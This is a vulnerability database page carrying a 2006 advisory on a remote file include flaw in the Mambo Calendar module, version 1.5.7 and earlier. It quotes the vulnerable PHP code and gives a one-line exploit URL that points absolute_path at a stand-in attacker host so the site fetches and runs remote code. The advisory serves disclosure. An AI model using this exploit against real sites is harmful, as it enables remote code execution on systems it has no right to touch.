Index
Bugtraq
Pełna lista
Błędy
Sztuczki
Exploity
Dorks list
Tylko z CVE
Tylko z CWE
Bogus
Ranking
CVEMAP
Świeża lista CVE
Producenci
Produkty
Słownik CWE
Sprawdź nr. CVE
Sprawdź nr. CWE
Szukaj
W Bugtraq
W bazie CVE
Po autorze
Po nr. CVE
Po nr. CWE
Po producencie
Po produkcie
RSS
Bugtraq
CVEMAP
CVE Produkty
Tylko Błędy
Tylko Exploity
Tylko Dorks
Więcej
cIFrex
Facebook
Twitter
Donate
O bazie
Lang
Polish
English
Submit
Calendar Mambo Module <= 1.5.7 Remote File Include Vulnerabilities
2006.07.26
Credit:
Matdhule
Risk:
Medium
Local:
No
Remote:
Yes
CVE:
CVE-2006-3843
CWE:
CWE-Other
Ogólna skala CVSS:
7.5/10
Znaczenie:
6.4/10
Łatwość wykorzystania:
10/10
Wymagany dostęp:
Zdalny
Złożoność ataku:
Niska
Autoryzacja:
Nie wymagana
Wpływ na poufność:
Częściowy
Wpływ na integralność:
Częściowy
Wpływ na dostępność:
Częściowy
------------------------------------------------------------------------ --------- Calendar Mambo Module <= 1.5.7 Remote File Include Vulnerabilities ------------------------------------------------------------------------ --------- Author : Matdhule Contact : matdhule (at) gmail (dot) com [email concealed] Web : http://www.solpotcrew.org/adv/matdhule-adv-calendar.txt Application : Calendar Module (com_calendar.php) Version : 1.5.7 and prior ------------------------------------------------------------------------ --------- Vulnerability: In folder components we found vulnerability script com_calendar.php. -----------------------com_calendar.php--------------------------------- <?php //Configuration include($absolute_path.'/components/calendar/cal_config.php'); if (!file_exists("language/calendar/".$lang."_calendar.php") ) { die("Invalid Language"); } else { include($absolute_path.'/language/calendar/'.$lang.'_calendar.php'); } ------------------------------------------------------------------------ - Variables $absolute_path are not properly sanitized. When register_globals=on and allow_fopenurl=on an attacker can exploit this vulnerability with a simple php injection script. ------------------------------------------------------------------------ --------- Exploit : http://[target]/[path]/components/com_calendar.php?absolute_path=http:// attacker.com/evil.txt? ------------------------------------------------------------------------ --------- Greetz : solpot, j4mbi_h4ck3r, h4ntu, the_day, phoux, bius, thama & all crews #mardongan, #e-c-h-o, #jambihackerlink @dalnet
See this note in RAW Version
Tweet
Vote for this issue:
0
0
50%
50%
Thanks for you vote!
Thanks for you comment!
Your message is in quarantine 48 hours.
Comment it here.
Nick (*)
Email (*)
Video
Text (*)
(*) -
required fields.
Cancel
Submit
{{ x.nick }}
|
Date:
{{ x.ux * 1000 | date:'yyyy-MM-dd' }}
{{ x.ux * 1000 | date:'HH:mm' }}
CET+1
{{ x.comment }}
Show all comments
Copyright
2024
, cxsecurity.com
Back to Top